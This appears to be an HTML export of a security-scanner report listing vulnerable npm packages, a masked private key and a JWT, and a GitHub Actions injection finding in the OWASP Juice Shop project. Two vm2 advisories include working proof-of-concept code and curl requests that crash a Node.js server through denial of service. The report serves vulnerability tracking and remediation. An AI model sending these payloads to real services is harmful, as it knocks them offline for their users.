+https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
+https://nvd.nist.gov/vuln/detail/CVE-2026-23745
+https://www.cve.org/CVERecord?id=CVE-2026-23745

+ + + + + + + +
+
+
+
+ Finding 212: CVE-2026-23950 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 176 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.4

+

node-tar,a Tar for Node.js, has a race condition vulnerability in +versions up to and including 7.5.3. This is due to an incomplete +handling of Unicode path collisions in the path-reservations + system. On case-insensitive or normalization-insensitive filesystems +(such as macOS APFS, In which it has been tested), the library fails to +lock colliding paths (e.g., ß and ss), +allowing them to be processed in parallel. This bypasses the library's +internal concurrency safeguards and permits Symlink Poisoning attacks +via race conditions. The library uses a PathReservations +system to ensure that metadata checks and file operations for the same +path are serialized. This prevents race conditions where one entry might + clobber another concurrently. This is a Race Condition which enables +Arbitrary File Overwrite. This vulnerability affects users and systems +using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss + are different), conflicting paths do not have their order properly +preserved under filesystems that ignore Unicode normalization (e.g., +APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en'). As a workaround, users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

+ + +
Mitigation
+

7.5.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23950
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
+https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
+https://nvd.nist.gov/vuln/detail/CVE-2026-23950
+https://www.cve.org/CVERecord?id=CVE-2026-23950

+ + + + + + + +
+
+
+
+ Finding 213: CVE-2026-24842 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.7

+

node-tar,a Tar for Node.js, contains a vulnerability in versions +prior to 7.5.7 where the security check for hardlink entries uses +different path resolution semantics than the actual hardlink creation +logic. This mismatch allows an attacker to craft a malicious TAR archive + that bypasses path traversal protections and creates hardlinks to +arbitrary files outside the extraction directory. Version 7.5.7 contains + a fix for the issue.

+ + +
Mitigation
+

7.5.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24842
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
+https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
+https://nvd.nist.gov/vuln/detail/CVE-2026-24842
+https://www.cve.org/CVERecord?id=CVE-2026-24842

+ + + + + + + +
+
+
+
+ Finding 214: CVE-2026-26960 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

+ + +
Description
+

node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.8

+

node-tar is a full-featured Tar for Node.js. When using default +options in versions 7.5.7 and below, an attacker-controlled archive can +create a hardlink inside the extraction directory that points to a file +outside the extraction root, enabling arbitrary file read and write as +the extracting user. Severity is high because the primitive bypasses +path protections and turns archive extraction into a direct filesystem +access primitive. This issue has been fixed in version 7.5.8.

+ + +
Mitigation
+

7.5.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-26960
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384
+https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx
+https://nvd.nist.gov/vuln/detail/CVE-2026-26960
+https://www.cve.org/CVERecord?id=CVE-2026-26960

+ + + + + + + +
+
+
+
+ Finding 215: CVE-2026-29786 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: hardlink path traversal via drive-relative linkpath
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.10

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, + tar can be tricked into creating a hardlink that points outside the +extraction directory by using a drive-relative link target such as +C:../target.txt, which enables file overwrite outside cwd during normal +tar.x() extraction. This issue has been patched in version 7.5.10.

+ + +
Mitigation
+

7.5.10

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-29786
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
+https://nvd.nist.gov/vuln/detail/CVE-2026-29786
+https://www.cve.org/CVERecord?id=CVE-2026-29786

+ + + + + + + +
+
+
+
+ Finding 216: CVE-2026-31802 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

tar: tar: File overwrite via drive-relative symlink traversal
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.11

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, + tar (npm) can be tricked into creating a symlink that points outside +the extraction directory by using a drive-relative symlink target such +as C:../../../target.txt, which enables file overwrite outside cwd +during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.

+ + +
Mitigation
+

7.5.11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31802
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
+https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
+https://nvd.nist.gov/vuln/detail/CVE-2026-31802
+https://www.cve.org/CVERecord?id=CVE-2026-31802

+ + + + + + + +
+
+
+
+ Finding 217: CVE-2025-59343 Tar-Fs 2.1.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar-fs2.1.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar-fs/package.json
+
+
+
+ + + + + +
Description
+

tar-fs: tar-fs symlink validation bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.1.1, 2.1.4, 1.16.6

+

tar-fs provides filesystem bindings for tar-stream. Versions prior to + 3.1.1, 2.1.3, and 1.16.5 are vulnerable to symlink validation bypass if + the destination directory is predictable with a specific tarball. This +issue has been patched in version 3.1.1, 2.1.4, and 1.16.6. A workaround + involves using the ignore option on non files/directories.

+ + +
Mitigation
+

3.1.1, 2.1.4, 1.16.6

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-59343
+https://github.com/mafintosh/tar-fs
+https://github.com/mafintosh/tar-fs/commit/0bd54cdf06da2b7b5b95cd4b062c9f4e0a8c4e09
+https://github.com/mafintosh/tar-fs/security/advisories/GHSA-vj76-c3g6-qr5v
+https://lists.debian.org/debian-lts-announce/2025/09/msg00028.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-59343
+https://www.cve.org/CVERecord?id=CVE-2025-59343

+ + + + + + + +
+
+
+
+ Finding 218: CVE-2025-12758 Validator 13.15.15 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 792 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
validator13.15.15
+ + + + + + + +
File Path
juice-shop/node_modules/validator/package.json
+
+
+
+ + + + + +
Description
+

Validator is Vulnerable to Incomplete Filtering of One or More Instances of Special Elements
+Target: Node.js
+Type: node-pkg
+Fixed version: 13.15.22

+

Versions of the package validator before 13.15.22 are vulnerable to +Incomplete Filtering of One or More Instances of Special Elements in the + isLength() function that does not take into account Unicode variation +selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to +improper string length calculation. This can lead to an application +using isLength for input validation accepting strings significantly +longer than intended, resulting in issues like data truncation in +databases, buffer overflows in other system components, or +denial-of-service.

+ + +
Mitigation
+

13.15.22

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://seclists.org/fulldisclosure/2026/Jan/27
+https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e
+https://github.com/validatorjs/validator.js
+https://github.com/validatorjs/validator.js/commit/d457ecaf55b0f3d8bd379d82757425d0d13dd382
+https://github.com/validatorjs/validator.js/pull/2616
+https://nvd.nist.gov/vuln/detail/CVE-2025-12758
+https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476

+ + + + + + + +
+
+
+
+ Finding 234: CVE-2026-44001 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

+ + +
Description
+

vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed +code to crash the host Node.js process via a single Promise constructor +that triggers an unhandled rejection propagating to the host. The fix +for CVE-2026-22709 (v3.10.2) only sanitized the onRejected callback in .then() and .catch() overrides and did not address the executor-to-unhandledRejection path.

+

Details

+

When sandboxed code creates a Promise whose executor sets Error.name to a Symbol() and then accesses .stack, V8's internal FormatStackTrace (C++) attempts Symbol.toString(), which throws a host-realm TypeError. Because this error originates inside the Promise executor and no .catch() handler is attached, it becomes an unhandled rejection that propagates to the host process.

+
    +
  • lib/setup-sandbox.js:38localPromise wraps the native Promise constructor but does not wrap the executor in try-catch.
    • +
  • lib/setup-sandbox.js:165-230resetPromiseSpecies and the .then()/.catch() overrides sanitize the onRejected callback chains, but do not intercept unhandled rejections originating from the executor itself.
    • +
+

The CVE-2026-22709 patch (v3.10.2) sanitized .then() and .catch() callback chains but left the executor-to-unhandledRejection path completely open.

+

Root Cause: Promise executor errors are not +caught/sanitized before they can propagate as unhandled rejections to +the host process, causing an immediate process crash.

+

allowAsync: false does not help: This setting only blocks async/await syntax and overrides .then()/.catch() to throw. The Promise constructor itself is still callable. Worse, because .catch() is blocked, any rejection from the executor is guaranteed to be unhandled — making allowAsync: false paradoxically more dangerous than true for this vulnerability.

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+
+// Works with ANY allowAsync setting — both true and false
+const vm = new VM({ timeout: 5000, allowAsync: false });
+
+try {
+  const result = vm.run(`
+    new Promise(function(r, j) {
+      var e = new Error();
+      e.name = Symbol();
+      e.stack;
+    });
+  `);
+  console.log("Result:", result);   // Reaches here (returns Promise object)
+} catch (err) {
+  console.log("Caught:", err);       // Never executed
+}
+
+console.log("After try-catch");      // Also prints normally
+
+// But on the next microtask tick:
+// [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string]
+// Exit code: 1
+//
+// try-catch cannot help — vm.run() returns synchronously,
+// the rejection fires asynchronously outside any catch scope.
+//
+// NOTE: allowAsync: false only blocks async/await syntax and
+// .then()/.catch() method calls. The Promise constructor itself
+// still executes, and the unhandled rejection still propagates.
+// In fact, allowAsync: false makes it WORSE — .catch() is blocked,
+// so the rejection is guaranteed to be unhandled.
+
+ +

HTTP demonstration (web service impact):

+
# 1. Confirm server is running
+curl -s http://localhost:3000/api/execute \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"code":"\"alive\""}'
+# => {"output":[],"errors":[],"result":"\"alive\"","executionTime":1}
+
+# 2. Send payload — server process will crash
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})"}'
+
+# 3. Server is dead (connection refused until restart)
+curl -s http://localhost:3000/  # => connection refused
+
+ +

Impact

+
    +
  • DoS: A single request crashes the entire host +Node.js process. All concurrent users lose service immediately. In +Node.js 15+, unhandled rejections terminate the process by default — no +special configuration is required for the crash to occur.
    • +
  • Persistent DoS despite restart policies: Even when +container orchestration (Docker restart policy, Kubernetes liveness +probes, PM2, etc.) automatically restarts the crashed process, an +attacker can send repeated requests to crash the process again before it + fully recovers. In our testing, a single curl request caused the Docker container to restart (confirmed via StartedAt timestamp change), and sending the next request immediately after restart triggered another crash. This creates a continuous denial-of-service loop + where the service never becomes available to legitimate users — each +restart is met with another crash before any real request can be served.
    • +
  • Amplification: A single HTTP request (~150 bytes) +terminates the entire host process serving all users. The cost to the +attacker is negligible compared to the impact.
    • +
  • Scope: All applications using vm2, regardless of allowAsync setting. allowAsync: false only blocks async/await syntax and .then()/.catch() method calls — the Promise constructor itself still executes, and the unhandled rejection still propagates. In fact, allowAsync: false makes the vulnerability worse because .catch() is blocked, guaranteeing the rejection is always unhandled.
    • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/advisories/GHSA-99p7-6v5w-7xg8
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh

+ + + + + + + +
+
+
+
+ Finding 235: CVE-2026-44004 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

Sandboxed code can call Buffer.alloc() with an arbitrary size to allocate memory directly on the host heap. Because Buffer.alloc is a synchronous C++ native call, vm2's timeout option cannot interrupt it. A single request can exhaust host memory and crash the process with a FATAL ERROR: Reached heap limit.

+

Details

+

In lib/vm.js:58, Buffer is exposed to the sandbox through the HOST object. The bridge proxy (lib/bridge.js) passes Buffer.alloc() calls to the host without any size validation.

+

Key technical distinction from regular JavaScript memory exhaustion (e.g., while(true) a.push(...)):
+- JavaScript loops: V8 can interrupt via timeout — vm2's timeout option works
+- Buffer.alloc(N): Executes as a single synchronous C++ call — V8 timeout has no opportunity to interrupt

+

This means:
+1. timeout: 5000 does NOT protect against this attack
+2. A single call allocates the entire requested size at once
+3. In memory-constrained environments (Docker, Lambda, Kubernetes pods), this causes immediate OOM crash

+

Tested amplification factor: ~100 bytes HTTP request — 1,000,000:1 or + greater (100 bytes request to 100MB+ host heap allocation).

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+const vm = new VM({ timeout: 5000 });
+
+// Buffer.alloc bypasses timeout — allocates 100MB on host heap
+const result = vm.run(`Buffer.alloc(1024*1024*100).length`);
+console.log(result); // 104857600 — timeout had no effect
+
+// Control test — JavaScript loop IS caught by timeout
+try {
+  vm.run(`var a=[]; while(true) a.push(1)`);
+} catch(e) {
+  console.log(e.message); // "Script execution timed out after 5000ms"
+}
+
+ +

HTTP demonstration (OOM crash):

+
# 1. Confirm server is running
+curl -s http://localhost:3000/api/execute \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"code":"\"alive\""}'
+# => {"result":"\"alive\""}
+
+# 2. Send Buffer.alloc payload — process crashes with OOM
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"Buffer.alloc(1024*1024*100).length"}'
+# => empty response (process died)
+
+# 3. Check server logs:
+# FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
+
+# Control test — JavaScript loop IS caught by timeout:
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"var a=[]; while(true) a.push(1)"}'
+# => {"errors":["Script execution timed out after 5000ms"]}
+# Server stays alive — timeout works for JS, but NOT for Buffer.alloc
+
+ +

Impact

+
    +
  • DoS: A single HTTP request crashes the host Node.js process via OOM. The timeout option provides no protection.
    • +
  • Environment-dependent severity:
    • +
  • Memory-constrained environments (Docker with memory + limits, Kubernetes pods, Lambda): The allocation exceeds the memory +limit, causing immediate process termination via OOM. This is the +primary threat scenario — FATAL ERROR: Reached heap limit was confirmed in testing.
    • +
  • Unconstrained environments: The allocation succeeds + and memory is reclaimed by GC after the request completes, resulting in + temporary performance degradation rather than a crash.
    • +
  • Scope: All applications using vm2. Default +configuration is vulnerable. Memory-constrained environments (Docker, +Kubernetes, Lambda) are most severely impacted.
    • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7

+ + + + + + + +
+
+
+
+ Finding 241: CVE-2024-37890 Ws 7.4.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
ws7.4.6
+ + + + + + + +
File Path
juice-shop/node_modules/engine.io/node_modules/ws/package.json
+
+
+
+ + + + + +
Description
+

nodejs-ws: denial of service when handling a request with many HTTP headers
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.2.4, 6.2.3, 7.5.10, 8.17.1

+

ws is an open source WebSocket client and server for Node.js. A +request with a number of headers exceeding theserver.maxHeadersCount +threshold could be used to crash a ws server. The vulnerability was +fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), +ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of +ws, the issue can be mitigated in the following ways: 1. Reduce the +maximum allowed length of the request headers using the +--max-http-header-size=size and/or the maxHeaderSize options so that no +more headers than the server.maxHeadersCount limit can be sent. 2. Set +server.maxHeadersCount to 0 so that no limit is applied.

+ + +
Mitigation
+

5.2.4, 6.2.3, 7.5.10, 8.17.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-37890
+https://github.com/websockets/ws
+https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f
+https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e
+https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c
+https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63
+https://github.com/websockets/ws/issues/2230
+https://github.com/websockets/ws/pull/2231
+https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q
+https://nodejs.org/api/http.html#servermaxheaderscount
+https://nvd.nist.gov/vuln/detail/CVE-2024-37890
+https://www.cve.org/CVERecord?id=CVE-2024-37890

+ + + + + + + +
+
+
+
+ Finding 242: Secret Detected in /juice-shop/build/lib/insecurity.js - Asymmetric Private Key + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
47
+ + + + + + + +
File Path
/juice-shop/build/lib/insecurity.js
+
+
+
+ + + + + +
Description
+

Asymmetric Private Key
+Category: AsymmetricPrivateKey
+Match: ----BEGIN RSA PRIVATE KEY-----**********************************************************************************************************************-----END RSA PRIVATE

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 1: yaml.github-actions.security.run-shell-injection.run-shell-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 78 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
21
+ + + + + + + +
File Path
/src/.github/workflows/update-challenges-ebook.yml
+
+
+
+ + + + + +
Description
+

Result message: Using variable interpolation ${{...}} with github context data in a run: step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. github + context data can have arbitrary user input and should be treated as +untrusted. Instead, use an intermediate environment variable with env: to store the data and use the environment variable in the run: script. Be sure to use double-quotes the environment variable, like this: "$ENVVAR".

+ + + + + + + + + + + + +
References
+

https:// +docs.github.com/en/actions/learn-github-actions/security-hardening-for- +github-actions#understanding-the-risk-of-script-injections
+https://securitylab.github.com/research/github-actions-untrusted-input/

+ + + + + + + +

Medium

+ +
+
+
+
+ Finding 243: Secret Detected in /juice-shop/frontend/src/app/app.guard.spec.ts - JWT Token + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
38
+ + + + + + + +
File Path
/juice-shop/frontend/src/app/app.guard.spec.ts
+
+
+
+ + + + + +
Description
+

JWT token
+Category: JWT
+Match: ocalStorage.setItem('token', '***********************')

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 236: CVE-2023-32313 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 74 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

vm2: Inspect Manipulation
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.9.18

+

vm2 is a sandbox that can run untrusted code with Node's built-in +modules. In versions 3.9.17 and lower of vm2 it was possible to get a +read-write reference to the node inspect method and edit options for console.log. As a result a threat actor can edit options for the console.log command. This vulnerability was patched in the release of version 3.9.18 of vm2. Users are advised to upgrade. Users unable to upgrade may make the inspect method readonly with vm.readonly(inspect) after creating a vm.

+ + +
Mitigation
+

3.9.18

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-32313
+https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238
+https://github.com/patriksimek/vm2/releases/tag/3.9.18
+https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v
+https://nvd.nist.gov/vuln/detail/CVE-2023-32313
+https://www.cve.org/CVERecord?id=CVE-2023-32313

+ + + + + + + +
+
+
+
+ Finding 178: CVE-2021-23771 Notevil 1.3.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
notevil1.3.3
+ + + + + + + +
File Path
juice-shop/node_modules/notevil/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

Sandbox escape in notevil and argencoders-notevil
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

This affects all versions of package notevil; all versions of package + argencoders-notevil. It is vulnerable to Sandbox Escape leading to +Prototype pollution. The package fails to restrict access to the main +context, allowing an attacker to add or modify an object's prototype. Note: This vulnerability derives from an incomplete fix in SNYK-JS-NOTEVIL-608878.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://github.com/mmckegg/notevil
+https://nvd.nist.gov/vuln/detail/CVE-2021-23771
+https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587
+https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946

+ + + + + + + +
+
+
+
+ Finding 33: CVE-2026-4046 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
